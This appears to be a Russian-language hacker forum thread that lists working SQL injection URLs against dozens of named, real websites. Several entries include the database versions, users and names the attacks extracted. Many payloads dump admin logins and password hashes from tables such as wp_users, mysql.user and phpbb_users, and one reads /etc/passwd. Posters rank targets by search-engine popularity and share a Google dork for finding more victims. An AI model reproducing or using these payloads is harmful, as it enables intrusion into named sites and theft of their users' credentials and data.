SQL Инъекции

ctbscopiers.com

Code:

http://ctbscopiers.com/productdetails.php?pid=-146+UNION+SELECT+1,2,3,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),5,6,7,8,9,10,11,12,13,14,15+--+

Version: 4.0.27-max-log
User: [email protected]
Database: ctbscopiers
OS: Linux



taiwanguts.com

Code:

http://www.taiwanguts.com/news.php?id=-298+union+select+1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6+--+

Version: 5.1.43-log
User: iseigthr_ben@localhost
Database: iseigthr_freddyaction
OS: Linux

P.S. Комментарий к taiwanguts.com: true ачатовцам не обязательно знать китайский язык, дабы проводить SQL-injection

 

Code:

http://www.pornfreeee.com/webmaster/showplugs.php?domain=-1%27+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6--+

pornfreeee@localhostornfreeee_phpld:5.0.45

 

www.wizard-soft.com

VERSION: 5.0.81-community - PHP/5.2.9
DATABASE: wizard4_cpuspeed
Current User: wizard4_cpuuser@localhost

 

www.webturizm.ru
Database: webturizm
User: webturizm@localhost
Version: 5.0.22

 

http://www.etageclub.ru/gallery_about.htm?id=40+UNION+SELECT+1,2,3,4,concat%28version%28%29,0x3a,0x3a,%20%20user%28%29,0x3a,0x3a,database%28%29%29,6--

5.0.77-log::[email protected]::db_subbox_14

 

http://jrandrachel.com/wordpress/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://nudephotocontest.com/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_pass,0x3a,user_login)+from+wp_users--

http://www.levelesyeux.com/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://www.cagou.com/blog/wp-content/plugins/photoracer/viewimg.php?id=-31+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-10+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://my.brilliantspot.com/wp_my/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://www.ilovepasta.it/pasta/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pass)+from+wp_users--

http://tronderglass.no/pfNewsDetail.php?NewsId=-12+union+select+1,2,group_concat(TABLE_NAME),4+from+information_schema.tables--

 

http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user_pass%29+from+wp_users--
http://www.intothepicture.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user_pass%29+from+wp_users--
=)

 

[email protected] | 5.0.51a-log

[email protected] | 5.0.90-log

[email protected] | 5.0.90-log

[email protected] | 5.0.81-log

Подробности тут

 

GRAYCELL@LOCALHOST:WWWGRAYCELLRU:5.0.70
Таблы немогу прочитать, или доступа нет или руки кривые...

 

http://www.aquafeed.com.tw/big5/new_detail.php?id=-2+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Database Version: 5.0.16-log
Database name: aquafeed_db
User name: WebSiteOwner@localhost

 

Code:

http://greenconsultancy.com/print_view.php?pageType=page&id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--+

[email protected]:5.0.58-enterprise-gpl:greenconsult

Code:

http://www.sflcn.com/story.php?id=-8069+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8

bahamagi_sfcndat@localhost:5.1.30:bahamagi_sfcnData

Code:

http://www.clockmarket.ru/catalog/show_large.php?clock_id=-1452+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,concat_ws(0x3a,user(),version(),database()),36,37,38,39&popup=1

c2_clockmarket@localhost:5.0.75-0ubuntu10.2:c2_clockmarket

Code:

http://mmorpgtop.woano.lv/index.php?do=out&id=-1+union+/*!select*/+concat_ws(0x3a,version(),database(),user())

5.0.89-community-log:mmorpg_mmorpgtop:mmorpg_purgen@localhost

 

http://www.voiphouse.co.uk/en/shop/index.php?cat_id=-912+union+select+1,concat_ws%280x2f,user,password%29+from+mysql.user--

 

Code:

http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+order+by+27--

Code:

http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

5.0.51a-24+lenny2

Code:

http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+limit+83,1--

 

5.0.51a-24+lenny2

 

http://police.am/page.php?section=pet&lenguige=am&id_menu=1+and+1=1

blind

http://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,column_nam e,3,4,5,6,7,8,9,10+from+information_schema.columns +where+table_name=CHAR(97,%20100,%20109,%20105,%20 110)/*

ttp://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,concat(use r,char(58),password),3,4,5,6,7,8,9,10+from+mysql.u ser/*

the same site

http://www.lusamut.net/level0_.php?cat_=-21+and+1=0+union+select+concat(username,char(58),p assword),2,3+from+users&slog=22

look at the <>title

http://www.armjob.am/resume.php?id=11'+union+select+1,2,concat(email_us er,char(58),pass_user)+from+job_user/*

 

Code:

http://www.vales.by/news.php?new_id=-88+union+select+1,user_password,3,4,5,6,username,8+FROM+phpbb_users+LIMIT+1,1+--+

 

Code:

http://ssa-bel.com/page.php?id=2%27+and+1=2+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3+--+

5.0.45-log:ssa_bel_com@localhost:ssa_bel_com

Гугл занимается такой же деятельностью как и мы=)
Вбил inurl: page.php?id= и искал сираницы из Беларуси. На второй странице в названии вижу число 6. Меня это смутило. Ссылка на сайт:

Code:

http://www.google.com.by/url?sa=t&source=web&ct=res&cd=16&ved=0CBAQFjAFOAo&url=http%3A%2F%2Fwww.plenki.by%2Fnews-page.php%3Fid%3D-105%2Bunion%2Bselect%2B0%2C1%2C2%2C3%2C4%2Cversion()%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19&rct=j&q=inurl:page.php%3Fid%3D&ei=0b-WS5XGDqTmnAOS3PC8Cw&usg=AFQjCNGz7uqgZpcTnPhlyMR41Ydo6PNBFA

а сам запрос:

Code:

http://www.google.com.by/#hl=ru&cr=countryBY&q=inurl:page.php%3Fid%3D&start=10&sa=N&fp=8c7f2520348b6730

Очень подняло настроение=)

 

http://enjoy.md/category.php?id=-2+UNION+SELECT%201,concat_ws(0x3a,NAME,EMAIL,REMARK,ADDRESS,LOGIN,PASSWORD,STATUS),3+FROM+user+LIMIT+54,1+--+

P.S: Не понял можно ли выкладывать в таком виде, если нет приношу извинения, исправлюсь.

 

http://www.rubikon-band.ru/?vrb=newslist&acl=-49%27+UNION+SELECT+1,2,concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29,4,5,6--+

 

omedu.ru официальный сайт поддержки ЕГЭ в Омской области. ПР4 ТИЦ 100

Code:

http://www.omedu.ru/?act=download&id=55&id_downloads_cat=-40+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,password,email),7,8,9,10,11+from+user+--+

stereopravda.ru ПР3 ТИЦ 50

Code:

http://www.stereopravda.ru/tov.php?cat=11&subcat=48&id=-96+uNIon+sELEct+1,2,3,user(),5,6,7,8,9,10,11+members+--+

bicopy.ru пр1

Code:

http://bicopy.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+--+

bologna.mgimo.ru ПР 6 ТИЦ 100

Code:

http://bologna.mgimo.ru/news.php?doc_id=310'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+--+

tanganyika.ru ПР4 ТИЦ 190

Code:

http://www.tanganyika.ru/gendesc.php?&gid=-20+uNIon+sELEct+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+

lakra-products.ru

Code:

http://lakra-products.ru/page.php?page=catalog&cat_id=-2.2+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12+from+information_schema.tables+--+

svarng.ru ПР3 ТИЦ30

Code:

http://www.svarng.ru/cat.htm?id=1+union+select+1,2,3,4,5,6,file_priv,8,9,10,11,12,13,14,15,16+from+mysql.user+--+

zzk.lv

Code:

http://www.zzk.lv/rus/tovari/?cat=14&id=-81+union+select+1,2,3,4,5,concat_ws(0x3a3a,username,password,level,gruppa,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125+from+ins_users+--+

massager.net.ua ПР2

Code:

http://www.massager.net.ua/index.php?page=catalog&cat_id=-4+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

sibkeramika.ru

Code:

http://sibkeramika.ru/index.php?m=shop&page=OpenBigImage&good_id=2&image_id=-84'+union+select+1,2,3,4,5,concat_ws(0x3a3a,user_id,email,password,access_site,group_id),7,8+from+users+limit+1,1+--+

ats-telecomserv.ru ПР2 ТИЦ40

Code:

http://ats-telecomserv.ru/?page=Price&ProductCat=-7+UnIon+seLEct+1,2,group_concat(table_name),4,5,6,7+from+information_schema.tables+group+by+table_schema+--+

ls-wheels.com ПР3 ТИЦ40

Code:

http://www.ls-wheels.com/cat/goods.php?id=-25+union+select+1,2,3,concat_ws(0x3a3a,Code,T_Code,Login,Passwd,FIO,www,EMail),5,6+frOm+ls_dw_Users+--+&raz=1'

ru-board.com ПР4 ТИЦ 850

Code:

http://www.ru-board.com/new/pollBooth.php?op=results&pollID=-2+uNIon+sELEct+concat_ws(0x3a3a,aid,name,pwd,radminsuper),2+from+nuke_authors+--+&screen=4&cat_id=65&viewtype=&action=view&lng=ru

solmaz.info ПР2

Code:

http://www.solmaz.info/gallery.php?photo_id=-611'+union+select+1,2,3,4,5,6,7,8,9+from+authors+--+&screen=4&cat_id=65&viewtype=&action=view&lng=ru

metallurg-nk.ru ПР4 ТИЦ 550

Code:

http://www.metallurg-nk.ru/media/index.php?cat=video&gallery_id=-93'+union+Select+1,2,3,4,5,6,7,8+from+information_schema.tables+--+

sakha-info.ru ПР4 ТИЦ 50

Code:

http://www.sakha-info.ru/?news=-3326'+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

replicawheel.ru

Code:

http://www.replicawheel.ru/cat/goods.php?id=next&pos=236&T_Code=-64+union+select+1,2,3,4,5,6+--+  

delotex.ru ПР1 ТИЦ20

Code:

http://www.delotex.ru/cat/?id=40+union+select+1,2,user(),4,5,6,7+--+

iberoasia.com

Code:

http://www.iberoasia.com/seccao.php?seccao=-7'+union+select+1,concat_ws(0x3a3a,user,nome,email,password),3+from+cliente+--+

aces.pt ПР6

Code:

http://www.aces.pt/resultado.php?concelho=-1'+union+select+1,table_name,3,4,5,6+from+information_schema.tables+--+&zona=&sector=8&nome=&morada=&pesquisa_avancada=Pesquisar

beni.ru ПР4 ТИЦ60

Code:

http://www.beni.ru/?part=28'+uNIon+sELEct+1,2,3,4,5,6,7,8+--+&a=cat&page=3'

yarkercher.ru ПР3 ТИЦ30

Code:

http://www.yarkercher.ru/?id=4&cat_id=-4+uNIon+sELEct+1,2,'test',4,5,6+--+

genza.ru ПР3 ТИЦ20

Code:

http://www.genza.ru/?p=rc&cat=boards&id=-7+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

kazak-volga.ru ПР3 ТИЦ20

Code:

http://www.kazak-volga.ru/index.php?cat_id=-76+union+select+1,2,3,4+--+

pro-coffee.ru ПР2 ТИЦ20

Code:

http://www.pro-coffee.ru/index.php?ActType=good&id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+  

uzbektours.com ПР2 ТИЦ10

Code:

http://www.uzbektours.com/main.php?nu=-60+union+select+pass+from+users+--+

satstyle.ru ПР2 ТИЦ10

Code:

http://satstyle.ru/index.php?goto=catalog_item&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

tsp-shop.ru ТИЦ100

Code:

http://www.tsp-shop.ru/vendors/?vendor=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

scandidom.ru ПР3 ТИЦ20

Code:

http://www.scandidom.ru/?part=show&section=kley&elementid=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+

rrc.nahabino-centr.ru ПР4 ТИЦ40

Code:

http://www.rrc.nahabino-centr.ru/index.php?p=-9+union+select+1,2,3,4+--+

nahabino-centr.ru ПР4 ТИЦ70

Code:

http://www.nahabino-centr.ru/news/?id=-397+union+select+1,2,3,4,5,6+--+

master-aav.ru ПР4 ТИЦ180

Code:

http://master-aav.ru/katalog.php?cat=-4+union+select+1,2,3,4,5+--+

i-t-c.ru ПР3 ТИЦ50

Code:

http://www.i-t-c.ru/index.php?id=552+union+select+1,2,3,concat_ws(0x3a3a,login,password,name),5+from+user+--+

media.worldpolitics.ru

Code:

http://media.worldpolitics.ru/index.php?action=cat_list&cat_id=-15+union+select+1,2,3,4,5+from+users+--+  

adipro.ru ПР2 ТИЦ10

Code:

http://www.adipro.ru/lib.php?id=-31+union+select+1,2,3,concat_Ws(0x3a3a,login,passw),5+from+users+limit+2,1+--+

ekokuhni.ru ПР4 ТИЦ325

Code:

http://www.ekokuhni.ru/?a=cat&id=-95'+uNIon+sELect+1,2,3,unhex(hex(user())),5,6,7,8,9,10,11,12,13,14,15+--+

fable.net.ru ТИЦ 40

Code:

http://fable.net.ru/modules.php?name=FAQ&myfaq=yes&id_cat=1'+union+select+concat_ws(0x3a3a,aid,name,email,pwd,radminsuper)+from+spnuke_authors+--+

irbis.spb.ru ПР4 ТИЦ700

Code:

http://www.irbis.spb.ru/catalog.php?cat_id=&cat=-45+UnIoN+SElecT+1,2,3,4+--+

novokubansk.info ПР3 ТИЦ50

Code:

http://www.novokubansk.info/lenta.php?postid=-1491+union+select+1,2,3,4,5,6,7,8,9+--+#top

dospel.by ПР3 ТИЦ10

Code:

http://www.dospel.by/catalog2.php?id=106&cat=-28+union+select+1,concat_ws(0x3a3a,login,pass),3,4,5,6,7+from+admins+--+

gandilyan.ru ПР3 ТИЦ10

Code:

http://www.gandilyan.ru/index.php?action=cat_show&ordby=firm&type_id=-61+union+select+1,2,concat_ws(0x3a3a,admin_login,admin_pass),4,5+from+admin+--+

emmaljunga-rus.ru ПР3 ТИЦ10

Code:

http://www.emmaljunga-rus.ru/index.php?action=cat_show&ordby=firm&type_id=-87+union+select+1,2,concat_ws(0x3a3a,admin_login,admin_pass),4,5+from+admin+--+

proindigo.ru

Code:

http://www.proindigo.ru/photos.php?album=-28+union+select+1,2,3+from+information_schema.tables+--+

vladtv.ru ПР5 ТИЦ220

Code:

http://www.vladtv.ru/show.php?id=-2071'+union+select+1,2,unhex(hex(concat_ws(0x3a3a,user_email,user_id,user_password))),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+limit+2,1+--+

bougiesland.com ПР4 ТИЦ10

Code:

http://www.bougiesland.com/boutique.php?mode=CitListe&CitCatId=7+union+select+1,2,3,4,user()+/*+

mirabab.fr ПР2

Code:

http://www.mirabab.fr/product_desc.php?id=-9110+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+

sfsp.fr ПР6

Code:

http://www.sfsp.fr/flash_email/index.php?cid=-86+union+select+concat_ws(0x3a3a,id_administrateur,login,mot_passe,profil,nom,prenom,telephone,email),2,3,4+from+administrateurs+--+

crd-international.com ПР4

Code:

http://www.crd-international.com/news.php?id=-161+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_Ws(0x3a3a,Util_Id,util_Civ,Util_Prenom,Util_Nom,Util_Login,Util_Pass,Util_Groupe),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+utilisateur+limit+1,1+--+

dmo.or.id ПР6

Code:

http://www.dmo.or.id/content.php?section=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+

ronjonesinsurance.com

Code:

http://www.ronjonesinsurance.com/content.php?section=News%20And%20Announcements&contentid=-7'+union+select+1+from+information_schema.tables+--+

proclinic.ru ПР1 ТИЦ10

Code:

http://www.proclinic.ru/product_desc.php?id=-869+union+select+1+--+

selectscales.co.uk ПР2 ТИЦ10

Code:

http://selectscales.co.uk/product_desc.php?id=-18+union+select+1,2,3,4,concat_ws(0x3a3a,admin_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_type),6,7,8,9,10,11,12,13,14,15,16,17+from+admin+--+

beautifulmirrors.com

Code:

http://www.beautifulmirrors.com/product_desc.php?id=-1066+union+select+1,2,3,concat_ws(0x3a3a,admin_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_type),5,6,7,8,9,10,11,12,13,14,15+from+admin+--+

thebids.info

Code:

http://thebids.info/product_desc.php?id=-19+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

direct-auctions-mijas-costa.com

Code:

http://direct-auctions-mijas-costa.com/product_desc.php?id=-128+union+select+1,2,concat_ws(0x3a3a,admin_email,username_len,pwd_len,site_root),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+sbauctions_config+--+

music-auctions.net

Code:

http://www.music-auctions.net/product_desc.php?id=-11+union+select+1,2,concat_ws(0x3a3a,concat_ws(0x3a3a,id,admin_name,pwd)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+freetplauctions_admin+--+

puntoaste.it

Code:

http://www.puntoaste.it/product_desc.php?id=-758+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

goianiavendas.com

Code:

http://www.goianiavendas.com/product_desc.php?id=-298+union+select+1,2,concat_ws(0x3a3a,username,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+sbclassified_members+--+

maisonfranceconfort.fr

Code:

http://www.maisonfranceconfort.fr/fr/societe.php?marque=-358+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+

kalli.lulu-en-furie.be

Code:

http://kalli.lulu-en-furie.be/index.php?viewmode=single&blogid=-508'+union+select+1,2,3,4,5,6,7+--+

kalli.fr

Code:

http://www.kalli.fr/index.php?viewmode=cat&cat=-4'+union+select+1,2,3,4,5,6,7+--+

ish-lyon.cnrs.fr ПР6 ТИЦ10

Code:

http://www.ish-lyon.cnrs.fr/Annuaire/Annuaire_Personne_Fiche_fr.php?ID=-996+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+--+

la-bnbox.fr ПР2

Code:

http://la-bnbox.fr/cahier.php?cid=-299+union+select+1,2,3,4,5,database(),7,8,9,10,11,12+--+

liendusang.com ПР1

Code:

http://www.liendusang.com/actualite.php?id=-341+union+select+1,2,3,4,5,concat_ws(0x3a3a,username,user_password,user_email,user_type),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+forum_users+/*+&titre=Le%20Grand%20Crois%C3%A9%20:%20Une%20offrande%20%C3%A0%20la%20d%C3%A9mence%20fervente%20!

faoug.ch ПР5 ТИЦ10

Code:

http://www.faoug.ch/index.php?mh=Actualit%E9s&menu=Calendrier&smenu=Les%20dates%20%E0%20venir&id=-112'+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

organisme-formation.fr ПР1

Code:

http://www.organisme-formation.fr/cv.php?cid=-6+union+select+1,2,3+--+

ieti.fr ПР4 ТИЦ10

Code:

http://www.ieti.fr/xoops/modules/bamagalerie3/viewcat.php?id=29'&cid=-14+union+select+1,2,3,4,database(),6,7,8,9,10+--+&min=0&orderby=titreA&show=

malkir.fr

Code:

http://www.malkir.fr/photographies.php?id=-4805'+union+select+1,2,concat_ws(0x3a3a,id,username,password),4,5,6,7,8,9+from+staff+--+

universite-dijon.fr

Code:

http://www.universite-dijon.fr/index/front_office/index_co.php?site_id=120&bg=2&rid=780&cid=-2176+UniON+SEleCT+1,2,3,4,5,6,7,8,9,10,11,12+/*+

flowercampings.com ПР3 ТИЦ10

Code:

http://www.flowercampings.com/fr/liste_camping-Bretagne-Normandie.htm?ref=-14+union+select+1,2,3+--+